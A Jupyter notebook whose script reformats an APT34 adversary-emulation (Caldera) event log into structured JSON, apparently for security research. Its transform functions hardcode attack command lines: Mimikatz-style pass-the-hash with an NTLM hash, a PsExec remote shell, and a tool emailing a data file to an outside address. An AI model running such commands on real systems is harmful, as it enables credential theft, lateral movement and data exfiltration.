**Purpose of the Script**:

The script processes a Caldera event log JSON file and generates a new structured JSON file in which each command is rewritten by a predefined transformation function. Simple commands map one-to-one to an output entry; complex commands expand into several new entries.

**Function Breakdown**:

- **Utility Functions**:

    - `convert_to_desired_format(timestamp)`:

        Converts an ISO 8601 timestamp to the format `'%Y-%m-%d %H:%M:%S.%f'`. Returns `None` for missing or invalid timestamps.

    - `filter_parameters(entry)`:

        Extracts the relevant fields (`delegated_timestamp`, `collected_timestamp`, `finished_timestamp`, `tactic`, `technique_name`, `ability_name`) from a log entry and reformats the three timestamps with `convert_to_desired_format`.

    - `parse_entry_ranges(ranges)`:

        Parses a comma-separated string of entry numbers and inclusive ranges (like "0-24,30,32") and returns the set of integers it covers.
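
The two parsing helpers can be sketched as follows. This is a minimal illustration of the behavior described above; the sample inputs are invented and do not come from the actual event log.

```python
from datetime import datetime

def convert_to_desired_format(timestamp):
    """Reformat an ISO 8601 timestamp; return None if it is missing or invalid."""
    if not timestamp:
        return None
    try:
        # Dropping "Z" keeps fromisoformat working on Python versions before 3.11.
        dt = datetime.fromisoformat(timestamp.replace("Z", ""))
        return dt.strftime('%Y-%m-%d %H:%M:%S.%f')
    except ValueError:
        return None

def parse_entry_ranges(ranges):
    """Expand a string like "0-2,5,7-8" into a set of integers (ranges are inclusive)."""
    result = set()
    for part in ranges.split(","):
        if "-" in part:
            start, end = map(int, part.split("-"))
            result.update(range(start, end + 1))
        else:
            result.add(int(part))
    return result

print(convert_to_desired_format("2024-01-15T10:30:45Z"))  # 2024-01-15 10:30:45.000000
print(convert_to_desired_format("not a timestamp"))       # None
print(sorted(parse_entry_ranges("0-2,5,7-8")))            # [0, 1, 2, 5, 7, 8]
```

Returning `None` instead of raising means a single malformed timestamp does not abort the whole run; it shows up as `null` in the output JSON.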

**Transformation Functions**:

- **Simple Transformation Functions**:
    
    Each function takes a command from the original entry, applies a specific transformation, and returns the new command.

    - `transform_function_1`: Returns the command as-is.

    - `transform_function_2`: Extracts the command from a string containing `--data "cmd=..."` and prefixes it with `"cmd.exe" /c`.

    - `transform_function_3`: Uses regex to extract the `-F 'sav=...'` and `-F "nen=..."` values from the command and joins them with a backslash into a single file path.

    - `transform_function_4`: Removes a leading `exec-background` and strips all double quotes.

- **Complex Transformation Functions**:
    
    These functions generate multiple commands from a single original entry.

    - `transform_complex_23`: Produces 2 entries: the original command and an Exchange Server `ews` directory path.

    - `transform_complex_38`: Produces 4 entries related to privilege escalation and file operations.

    - `transform_complex_40`: Produces 2 entries related to data exfiltration via `VMware.exe`: the `C:\ProgramData\VMware` directory and the full command line.

    - `transform_complex_41`: Produces 4 entries related to cleanup and process termination.

- **Core Processing Functions**:

    - `process_entries(data, commands)`:

        Iterates over each entry of the original log, looks up the transformation function for the entry's index in `TRANSFORM_MAPPING`, and calls it by name. Each resulting command is stored under a new sequential entry number together with the fields returned by `filter_parameters`, so entries generated by a complex transformation retain the metadata of the original entry. Entries whose index is not covered by the mapping are copied through unchanged.

- **Main Script Logic**:

    - `main(input_file, output_file)`:

        Reads the input JSON file, extracts commands, processes them sequentially, generates the transformed output, and saves it to the specified output file.
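
The transformation and renumbering behavior described above can be sketched as follows. The sample commands, the `transform_complex_demo` function, and the `TRANSFORMS` list are hypothetical and exist only for illustration; in particular, the list stands in for the script's lookup of functions by name.

```python
import re

def transform_function_2(commands, index, current_entry_num):
    # Pull the payload out of --data "cmd=..." and prefix it with "cmd.exe" /c.
    m = re.search(r'--data "cmd=([^"]+)"', commands[index])
    cmd = f'"cmd.exe" /c {m.group(1)}' if m else commands[index]
    return {str(current_entry_num): (index, cmd)}, current_entry_num + 1

def transform_function_4(commands, index, current_entry_num):
    # Drop a leading exec-background and remove every double quote.
    cmd = re.sub(r"^exec-background\s+", "", commands[index]).replace('"', "")
    return {str(current_entry_num): (index, cmd)}, current_entry_num + 1

def transform_complex_demo(commands, index, current_entry_num):
    # Hypothetical one-to-many transform: two output entries from one log entry.
    out = {}
    for cmd in (commands[index], r"C:\Example\derived.exe"):
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

# Hypothetical sample commands, not taken from the real log.
commands = [
    'curl -s --data "cmd=whoami" http://example.invalid/shell.aspx',
    r'exec-background "C:\Temp\tool.exe" -x',
    "hostname",
]
# One transform per entry index, in order.
TRANSFORMS = [transform_function_2, transform_function_4, transform_complex_demo]

results, next_num = {}, 0
for idx, fn in enumerate(TRANSFORMS):
    mapped, next_num = fn(commands, idx, next_num)
    results.update(mapped)

for new_num, (orig_idx, cmd) in results.items():
    print(new_num, orig_idx, cmd)
# 0 0 "cmd.exe" /c whoami
# 1 1 C:\Temp\tool.exe -x
# 2 2 hostname
# 3 2 C:\Example\derived.exe
```

Every transform returns both its output entries and the next free entry number, which is what lets a one-to-many transform shift the numbering of all later entries while each output still records the index of the log entry it came from.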

**Execution**:

The script reads a Caldera event log file (`apt34-test 1_event-logs.json`), transforms the commands based on specific rules, and writes the structured output to a new file (`apt34-test 1_event-logs_extracted_information.json`).
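
To show the shape of a single output entry, here is a minimal sketch that runs one log entry through the field extraction. The entry's values are invented for illustration; only the key names (`attack_metadata`, `ability_metadata`, and the three timestamp fields) follow the script.

```python
import json
from datetime import datetime

def convert_to_desired_format(timestamp):
    # ISO 8601 in, '%Y-%m-%d %H:%M:%S.%f' out; None for missing or invalid input.
    if not timestamp:
        return None
    try:
        dt = datetime.fromisoformat(timestamp.replace("Z", ""))
        return dt.strftime("%Y-%m-%d %H:%M:%S.%f")
    except ValueError:
        return None

def filter_parameters(entry):
    # Keep only the six metadata fields that go into the output.
    attack = entry.get("attack_metadata", {})
    ability = entry.get("ability_metadata", {})
    return {
        "delegated_timestamp": convert_to_desired_format(entry.get("delegated_timestamp", "")),
        "collected_timestamp": convert_to_desired_format(entry.get("collected_timestamp", "")),
        "finished_timestamp": convert_to_desired_format(entry.get("finished_timestamp", "")),
        "tactic": attack.get("tactic", ""),
        "technique_name": attack.get("technique_name", ""),
        "ability_name": ability.get("ability_name", ""),
    }

# Hypothetical log entry; all values are made up.
entry = {
    "command": "whoami",
    "delegated_timestamp": "2024-01-15T10:30:45Z",
    "collected_timestamp": "2024-01-15T10:30:50Z",
    "finished_timestamp": "2024-01-15T10:30:52Z",
    "attack_metadata": {"tactic": "discovery", "technique_name": "System Owner/User Discovery"},
    "ability_metadata": {"ability_name": "Identify active user"},
}

# Output entries are keyed by their new entry number, stored as a string.
output = {"0": {"new_command": entry["command"], **filter_parameters(entry)}}
print(json.dumps(output, indent=4))
```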

In [1]:
caldera_event_log_file = 'apt34-test 1_event-logs.json'
output_json_path = 'apt34-test 1_event-logs_extracted_information.json'

In [2]:
import json
import re
from datetime import datetime

# Convert timestamp to desired format
def convert_to_desired_format(timestamp):
    if not timestamp:
        return None
    try:
        ts = timestamp.replace("Z", "")
        dt = datetime.fromisoformat(ts)
        return dt.strftime('%Y-%m-%d %H:%M:%S.%f')
    except ValueError:
        return None

# Fields to include in the final output
FIELDS_TO_INCLUDE = [
    "delegated_timestamp", "collected_timestamp", "finished_timestamp", 
    "tactic", "technique_name", "ability_name"
]

# Mapping of entry ranges to transformation functions
TRANSFORM_MAPPING = {
    1: ("0-22,24,30,32,42-43", "transform_function_1"),
    2: ("25-27,29,31",       "transform_function_2"),
    3: ("28,35-37",          "transform_function_3"),
    4: ("33-34",             "transform_function_4"),
    5: ("23",                "transform_complex_23"),
    6: ("38",                "transform_complex_38"),
    7: ("40",                "transform_complex_40"),
    8: ("41",                "transform_complex_41"),
}

# Extract only the required metadata from an entry
def filter_parameters(entry):
    return {
        "delegated_timestamp": convert_to_desired_format(entry.get("delegated_timestamp", "")),
        "collected_timestamp": convert_to_desired_format(entry.get("collected_timestamp", "")),
        "finished_timestamp":  convert_to_desired_format(entry.get("finished_timestamp", "")),
        "tactic":        entry.get("attack_metadata", {}).get("tactic", ""),
        "technique_name":entry.get("attack_metadata", {}).get("technique_name", ""),
        "ability_name":  entry.get("ability_metadata", {}).get("ability_name", "")
    }

# Parse a string like "0-5,10,12-14" into a set of integers
def parse_entry_ranges(ranges):
    s = set()
    for part in ranges.split(","):
        if "-" in part:
            a,b = map(int, part.split("-"))
            s.update(range(a, b+1))
        else:
            s.add(int(part))
    return s

# --- simple transform fns ---------------------------------------------------
def transform_function_1(commands, index, current_entry_num):
    return { str(current_entry_num): (index, commands[index]) }, current_entry_num + 1

def transform_function_2(commands, index, current_entry_num):
    m = re.search(r'--data "cmd=([^"]+)"', commands[index])
    cmd = f'"cmd.exe" /c {m.group(1)}' if m else commands[index]
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

def transform_function_3(commands, index, current_entry_num):
    m1 = re.search(r"-F 'sav=([^']+)'", commands[index])
    m2 = re.search(r'-F "nen=([^"]+)"', commands[index])
    cmd = f"{m1.group(1)}\\{m2.group(1)}" if m1 and m2 else commands[index]
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

def transform_function_4(commands, index, current_entry_num):
    cmd = re.sub(r"^exec-background\s+", "", commands[index]).replace('"', '')
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

# --- complex transform fns --------------------------------------------------
def transform_complex_23(commands, index, current_entry_num):
    derived = [
        commands[index],
        r'C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews'
    ]

    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

def transform_complex_38(commands, index, current_entry_num):
    derived = [
        r'C:\Windows\system32\cmd.exe',
        r'C:\Windows\System32\mom64.exe  ""privilege::debug"" ""sekurlsa::pth /user:tous /domain:boombox /ntlm:30d804728ae8ca806fa183a81d8b97b0""',
        # r'C:\Windows\Temp\Nt.dat',
        r'C:\ProgramData\Nt.dat',
        r'C:\Windows\System32\ps.exe  \\10.1.0.7 cmd.exe'
    ]

    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

def transform_complex_40(commands, index, current_entry_num):
    derived = [
        r'C:\ProgramData\VMware',
        # r'C:\ProgramData\VMware\VMware.exe  --path=""sitedata.bak"" --to=""dungeon@shirinfarhad.com"" --from=""gosta@boombox.local"" --server=""10.1.0.6"" --password=\'Bl1nk182@g\' --chunksize=""200000""'
        'C:\\ProgramData\\VMware\\VMware.exe  --path="sitedata.bak" --to="dungeon@shirinfarhad.com" --from="gosta@boombox.local" --server="10.1.0.6" --password=\'Bl1nk182@g\' --chunksize="200000"'
    ]
    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

def transform_complex_41(commands, index, current_entry_num):
    derived = [
        r'C:\ProgramData\VMware\VMware.exe',
        r'C:\Windows\System32\mom64.exe',
        r'C:\Windows\Temp\Nt.dat',
        r'C:\Windows\System32\ps.exe'
    ]
    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

# --- core processing --------------------------------------------------------
def process_entries(data, commands):
    transformed = {}
    current_num = 0

    for idx, entry in enumerate(data):
        # pick the right transformer
        for ranges, fn_name in TRANSFORM_MAPPING.values():
            if idx in parse_entry_ranges(ranges):
                fn = globals()[fn_name]
                raw_map, current_num = fn(commands, idx, current_num)
                # wrap each with metadata
                for new_i, (orig_i, cmd) in raw_map.items():
                    transformed[new_i] = {
                        "new_command": cmd,
                        **filter_parameters(data[orig_i])
                    }
                break
        else:
            # no special transform
            transformed[str(current_num)] = {
                "new_command": commands[idx],
                **filter_parameters(entry)
            }
            current_num += 1

    return transformed

# --- entry point ------------------------------------------------------------
def main(input_file, output_file):
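    # Open both files as UTF-8 explicitly so the result does not depend on the platform default.
    with open(input_file, encoding="utf-8") as f:
        data = json.load(f)
    cmds = [e.get("command", "") for e in data]
    result = process_entries(data, cmds)
    with open(output_file, "w", encoding="utf-8") as out:
        json.dump(result, out, indent=4)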
    print("Transformed data saved to", output_file)

In [3]:
main(caldera_event_log_file, output_json_path)

Transformed data saved to apt34-test 1_event-logs_extracted_information.json
